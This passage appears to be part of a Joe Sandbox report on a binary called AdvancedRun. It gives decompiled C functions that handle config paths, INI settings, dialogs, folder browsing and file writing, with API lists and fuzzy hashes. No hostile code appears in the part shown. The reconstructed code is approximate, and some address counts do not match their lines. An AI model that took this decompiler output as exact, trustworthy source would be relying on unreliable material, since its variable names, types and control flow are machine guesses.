                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                  • String ID: .cfg
                                                                  • API String ID: 776488737-3410578098
                                                                  • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                  • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                  • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                  • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 64%
                                                                  			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
                                                                  				void _v514;
                                                                  				signed short _v516;
                                                                  				void _v1026;
                                                                  				signed short _v1028;
                                                                  				void* __esi;
                                                                  				void* _t17;
                                                                  				intOrPtr* _t26;
                                                                  				signed short* _t28;
                                                                  
                                                                  				_v516 = _v516 & 0x00000000;
                                                                  				_t26 = __ecx;
                                                                  				memset( &_v514, 0, 0x1fc);
                                                                  				_v1028 = _v1028 & 0x00000000;
                                                                  				memset( &_v1026, 0, 0x1fc);
                                                                  				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
                                                                  				_t28 =  &_v516;
                                                                  				E00407250(_t28, _t17);
                                                                  				_push(_t28);
                                                                  				_push(L"</%s>\r\n");
                                                                  				_push(0xff);
                                                                  				_push( &_v1028);
                                                                  				L0040B1EC();
                                                                  				return E00407343(_t26, _a4,  &_v1028);
                                                                  			}

                                                                  Instruction addresses (one per line of the C-Code above): 0x00407e2d 0x00407e46 0x00407e48 0x00407e4d 0x00407e5f 0x00407e6b 0x00407e6f 0x00407e75 0x00407e7c 0x00407e7d 0x00407e88 0x00407e8d 0x00407e8e 0x00407eaa

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00407E48
                                                                  • memset.MSVCRT ref: 00407E5F
                                                                    • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                    • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                  • _snwprintf.MSVCRT ref: 00407E8E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                  • String ID: </%s>
                                                                  • API String ID: 3400436232-259020660
                                                                  • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                  • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                  • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                  • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 77%
                                                                  			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
                                                                  				void _v8198;
                                                                  				short _v8200;
                                                                  				void* _t9;
                                                                  				void* _t12;
                                                                  				intOrPtr _t19;
                                                                  				intOrPtr _t20;
                                                                  
                                                                  				_t19 = __ecx;
                                                                  				_t9 = E0040B550(0x2004, __ecx);
                                                                  				_t20 = _t19;
                                                                  				if(_t20 == 0) {
                                                                  					_t20 =  *0x40fe24; // 0x0
                                                                  				}
                                                                  				_t25 =  *0x40fb90;
                                                                  				if( *0x40fb90 != 0) {
                                                                  					_v8200 = _v8200 & 0x00000000;
                                                                  					memset( &_v8198, 0, 0x2000);
                                                                  					_push(_t20);
                                                                  					_t12 = 5;
                                                                  					E00405E8D(_t12);
                                                                  					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
                                                                  						SetWindowTextW(_a4,  &_v8200);
                                                                  					}
                                                                  					return EnumChildWindows(_a4, E00405DAC, 0);
                                                                  				}
                                                                  				return _t9;
                                                                  			}

                                                                  Instruction addresses (one per line of the C-Code above): 0x00405e0a 0x00405e12 0x00405e18 0x00405e1c 0x00405e1e 0x00405e1e 0x00405e24 0x00405e2c 0x00405e2e 0x00405e44 0x00405e49 0x00405e4c 0x00405e4d 0x00405e68 0x00405e74 0x00405e74 0x00000000 0x00405e84 0x00405e8c

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                                  • String ID: caption
                                                                  • API String ID: 1523050162-4135340389
                                                                  • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                  • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                  • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                  • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                  				struct HINSTANCE__* _t11;
                                                                  				struct HINSTANCE__** _t14;
                                                                  				struct HINSTANCE__* _t15;
                                                                  
                                                                  				_t14 = __eax;
                                                                  				if( *((intOrPtr*)(__eax)) == 0) {
                                                                  					_t11 = E00405436(L"winsta.dll");
                                                                  					 *_t14 = _t11;
                                                                  					if(_t11 != 0) {
                                                                  						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
                                                                  					}
                                                                  				}
                                                                  				_t15 = _t14[1];
                                                                  				if(_t15 == 0) {
                                                                  					return 0;
                                                                  				} else {
                                                                  					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
                                                                  				}
                                                                  			}

                                                                  Instruction addresses (one per line of the C-Code above): 0x00409a4a 0x00409a4f 0x00409a56 0x00409a5e 0x00409a60 0x00409a6e 0x00409a6e 0x00409a60 0x00409a71 0x00409a76 0x00000000 0x00409a78 0x00000000 0x00409a89

                                                                  APIs
                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                  • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                  • API String ID: 946536540-379566740
                                                                  • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                  • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                  • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                  • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 93%
                                                                  			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                  				signed int _t21;
                                                                  				signed int _t23;
                                                                  				void* _t24;
                                                                  				signed int _t31;
                                                                  				void* _t33;
                                                                  				void* _t44;
                                                                  				signed int _t46;
                                                                  				void* _t48;
                                                                  				signed int _t51;
                                                                  				int _t52;
                                                                  				void** _t53;
                                                                  				void* _t58;
                                                                  
                                                                  				_t53 = __esi;
                                                                  				_t1 =  &(_t53[1]); // 0x0
                                                                  				_t51 =  *_t1;
                                                                  				_t21 = 0;
                                                                  				if(_t51 <= 0) {
                                                                  					L4:
                                                                  					_t2 =  &(_t53[2]); // 0x8
                                                                  					_t33 =  *_t53;
                                                                  					_t23 =  *_t2 + _t51;
                                                                  					_t46 = 8;
                                                                  					_t53[1] = _t23;
                                                                  					_t24 = _t23 * _t46;
                                                                  					_push( ~(0 | _t58 > 0x00000000) | _t24);
                                                                  					L0040B26C();
                                                                  					_t10 =  &(_t53[1]); // 0x0
                                                                  					 *_t53 = _t24;
                                                                  					memset(_t24, 0,  *_t10 << 3);
                                                                  					_t52 = _t51 << 3;
                                                                  					memcpy( *_t53, _t33, _t52);
                                                                  					if(_t33 != 0) {
                                                                  						_push(_t33);
                                                                  						L0040B272();
                                                                  					}
                                                                  					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
                                                                  					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                                                  				} else {
                                                                  					_t44 =  *__esi;
                                                                  					_t48 = _t44;
                                                                  					while( *_t48 != 0) {
                                                                  						_t21 = _t21 + 1;
                                                                  						_t48 = _t48 + 8;
                                                                  						_t58 = _t21 - _t51;
                                                                  						if(_t58 < 0) {
                                                                  							continue;
                                                                  						} else {
                                                                  							goto L4;
                                                                  						}
                                                                  						goto L7;
                                                                  					}
                                                                  					_t31 = _t21 << 3;
                                                                  					 *((intOrPtr*)(_t44 + _t31)) = _a4;
                                                                  					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                                                  				}
                                                                  				L7:
                                                                  				return 1;
                                                                  			}

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@??3@memcpymemset
                                                                  • String ID:
                                                                  • API String ID: 1865533344-0
                                                                  • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                  • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                  • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                  • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 35%
                                                                  			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
                                                                  				char _v16390;
                                                                  				short _v16392;
                                                                  				void* __edi;
                                                                  				intOrPtr* _t30;
                                                                  				intOrPtr* _t34;
                                                                  				signed int _t36;
                                                                  				signed int _t37;
                                                                  
                                                                  				_t30 = __ecx;
                                                                  				E0040B550(0x4004, __ecx);
                                                                  				_push(0x4000);
                                                                  				_push(0);
                                                                  				_v16392 = 0;
                                                                  				_t34 = _t30;
                                                                  				_push( &_v16390);
                                                                  				if(_a4 == 0) {
                                                                  					memset();
                                                                  					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20);
                                                                  					asm("sbb esi, esi");
                                                                  					_t37 =  ~_t36;
                                                                  					E004051B8( &_v16392, _t34, _a16);
                                                                  				} else {
                                                                  					memset();
                                                                  					E0040512F(_a16,  *_t34,  &_v16392);
                                                                  					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
                                                                  				}
                                                                  				return _t37;
                                                                  			}

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00409E08
                                                                    • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                    • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                  • memset.MSVCRT ref: 00409E3B
                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,0040C4E8,?,00002000,?), ref: 00409E5D
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                  • String ID:
                                                                  • API String ID: 1127616056-0
                                                                  • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                  • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                  • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                  • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 37%
                                                                  			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
                                                                  				void* _v8;
                                                                  				wchar_t* _v16;
                                                                  				intOrPtr _v20;
                                                                  				intOrPtr _v24;
                                                                  				intOrPtr _v28;
                                                                  				intOrPtr _v32;
                                                                  				intOrPtr _v36;
                                                                  				char _v40;
                                                                  				long _v564;
                                                                  				char* _t18;
                                                                  				char* _t22;
                                                                  				wchar_t* _t23;
                                                                  				intOrPtr* _t24;
                                                                  				intOrPtr* _t26;
                                                                  				intOrPtr _t30;
                                                                  				void* _t35;
                                                                  				char* _t36;
                                                                  
                                                                  				_t18 =  &_v8;
                                                                  				_t30 = 0;
                                                                  				__imp__SHGetMalloc(_t18);
                                                                  				if(_t18 >= 0) {
                                                                  					_v40 = _a4;
                                                                  					_v28 = _a8;
                                                                  					_t22 =  &_v40;
                                                                  					_v36 = 0;
                                                                  					_v32 = 0;
                                                                  					_v24 = 4;
                                                                  					_v20 = E0040AC81;
                                                                  					_v16 = __esi;
                                                                  					__imp__SHBrowseForFolderW(_t22, _t35);
                                                                  					_t36 = _t22;
                                                                  					if(_t36 != 0) {
                                                                  						_t23 =  &_v564;
                                                                  						__imp__SHGetPathFromIDListW(_t36, _t23);
                                                                  						if(_t23 != 0) {
                                                                  							_t30 = 1;
                                                                  							wcscpy(__esi,  &_v564);
                                                                  						}
                                                                  						_t24 = _v8;
                                                                  						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
                                                                  						_t26 = _v8;
                                                                  						 *((intOrPtr*)( *_t26 + 8))(_t26);
                                                                  					}
                                                                  				}
                                                                  				return _t30;
                                                                  			}

                                                                  APIs
                                                                  • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                  • wcscpy.MSVCRT ref: 0040AD65
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                  • String ID:
                                                                  • API String ID: 3917621476-0
                                                                  • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                  • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                  • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                  • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                  				long _v8;
                                                                  				long _v12;
                                                                  				long _t13;
                                                                  				void* _t14;
                                                                  				struct HWND__* _t24;
                                                                  
                                                                  				_t24 = GetDlgItem(_a4, _a8);
                                                                  				_t13 = SendMessageW(_t24, 0x146, 0, 0);
                                                                  				_v12 = _t13;
                                                                  				_v8 = 0;
                                                                  				if(_t13 <= 0) {
                                                                  					L3:
                                                                  					_t14 = 0;
                                                                  				} else {
                                                                  					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
                                                                  						_v8 = _v8 + 1;
                                                                  						if(_v8 < _v12) {
                                                                  							continue;
                                                                  						} else {
                                                                  							goto L3;
                                                                  						}
                                                                  						goto L4;
                                                                  					}
                                                                  					SendMessageW(_t24, 0x14e, _v8, 0);
                                                                  					_t14 = 1;
                                                                  				}
                                                                  				L4:
                                                                  				return _t14;
                                                                  			}

                                                                  APIs
                                                                  • GetDlgItem.USER32 ref: 00404A52
                                                                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Item
                                                                  • String ID:
                                                                  • API String ID: 3888421826-0
                                                                  • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                  • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                  • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                  • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 93%
                                                                  			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
                                                                  				long _v8;
                                                                  				void _v8199;
                                                                  				char _v8200;
                                                                  
                                                                  				/* Write a wide string to a file handle as ANSI text. */
                                                                  				E0040B550(0x2004, __ecx);                     /* called before the 8 KiB frame is used; consistent with a stack-probe helper (inference) */
                                                                  				_v8200 = 0;
                                                                  				memset( &_v8199, 0, 0x1fff);                  /* zero the whole 0x2000-byte buffer so strlen() below is bounded */
                                                                  				/* Convert _a8 (null-terminated, length -1) with code page 0 (CP_ACP) into at most 0x1fff bytes.
                                                                  				   The return value is not checked: if the text does not fit, the conversion fails and whatever
                                                                  				   landed in the buffer is still written out. */
                                                                  				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                                  				/* strlen() rather than the conversion result decides how many bytes go to the file; _v8
                                                                  				   receives the bytes-written count and is likewise not checked. */
                                                                  				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                                  			}
                                                                  Instruction addresses (one per decompiled line): 0x004072e0 0x004072f7 0x004072fd 0x00407316 0x00407342

                                                                  APIs
                                                                  • memset.MSVCRT ref: 004072FD
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                  • strlen.MSVCRT ref: 00407328
                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                  • String ID:
                                                                  • API String ID: 2754987064-0
                                                                  • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                  • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                  • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                  • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00408DC8(void** __eax, struct HWND__* _a4) {
                                                                  				int _t7;
                                                                  				void** _t11;
                                                                  
                                                                  				_t11 = __eax;
                                                                  				/* *0x4101b4 is a re-entrancy flag: the dialog is only shown when it is not already open. */
                                                                  				if( *0x4101b4 == 0) {
                                                                  					/* Copy the caller's data (0x50 bytes from the first field, 0x2cc from the second)
                                                                  					   into the globals the dialog procedure works on. */
                                                                  					memcpy(0x40f5c8,  *__eax, 0x50);
                                                                  					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
                                                                  					 *0x4101b4 = 1;
                                                                  					/* Modal dialog from resource 0x6b of this module, owner _a4, dialog procedure E00408ADB. */
                                                                  					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
                                                                  					 *0x4101b4 =  *0x4101b4 & 0x00000000;        /* clear the flag once the dialog closes */
                                                                  					 *0x40f2f4 = _t7;                            /* keep the dialog's return value for the caller */
                                                                  					return 1;
                                                                  				} else {
                                                                  					return 1;                                    /* already open: returns 1 without doing anything */
                                                                  				}
                                                                  			}
                                                                  Instruction addresses (one per decompiled line): 0x00408dd0 0x00408dd2 0x00408de2 0x00408df4 0x00408e01 0x00408e1b 0x00408e21 0x00408e28 0x00408e30 0x00408dd4 0x00408dd8 0x00408dd8

                                                                  APIs
                                                                  • memcpy.MSVCRT ref: 00408DE2
                                                                  • memcpy.MSVCRT ref: 00408DF4
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00408E07
                                                                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_00008ADB,00000000), ref: 00408E1B
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$DialogHandleModuleParam
                                                                  • String ID:
                                                                  • API String ID: 1386444988-0
                                                                  • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                  • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                  • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                  • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004050E1(wchar_t* __edi, wchar_t* _a4) {
                                                                  				int _t10;
                                                                  				int _t12;
                                                                  				void* _t23;
                                                                  				wchar_t* _t24;
                                                                  				signed int _t25;
                                                                  
                                                                  				/* Bounded append of _a4 onto the wide string at __edi. 0x3ff is the maximum number of
                                                                  				   characters left in the destination, so with the terminator the buffer is treated as
                                                                  				   0x400 wchar_t (2 KiB). Returns the destination pointer. */
                                                                  				_t24 = __edi;
                                                                  				_t25 = wcslen(__edi);
                                                                  				_t10 = wcslen(_a4);
                                                                  				_t23 = _t10 + _t25;                             /* combined length */
                                                                  				if(_t23 >= 0x3ff) {
                                                                  					/* len(_a4) - combined + 0x3ff simplifies to 0x3ff - len(__edi): the free room */
                                                                  					_t12 = _t10 - _t23 + 0x3ff;
                                                                  					if(_t12 > 0) {
                                                                  						/* wcsncat copies at most _t12 characters and appends the terminator, so the result is
                                                                  						   exactly 0x3ff characters; a destination already at or past the limit is left untouched.
                                                                  						   (__edi + _t25 * 2 is the decompiler's byte-offset form of __edi + wcslen(__edi).) */
                                                                  						wcsncat(__edi + _t25 * 2, _a4, _t12);
                                                                  					}
                                                                  				} else {
                                                                  					wcscat(__edi + _t25 * 2, _a4);                  /* fits: plain append */
                                                                  				}
                                                                  				return _t24;
                                                                  			}
                                                                  Instruction addresses (one per decompiled line): 0x004050e1 0x004050ec 0x004050ee 0x004050f5 0x004050ff 0x00405114 0x00405118 0x00405123 0x00405128 0x00405101 0x00405109 0x0040510f 0x0040512e

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
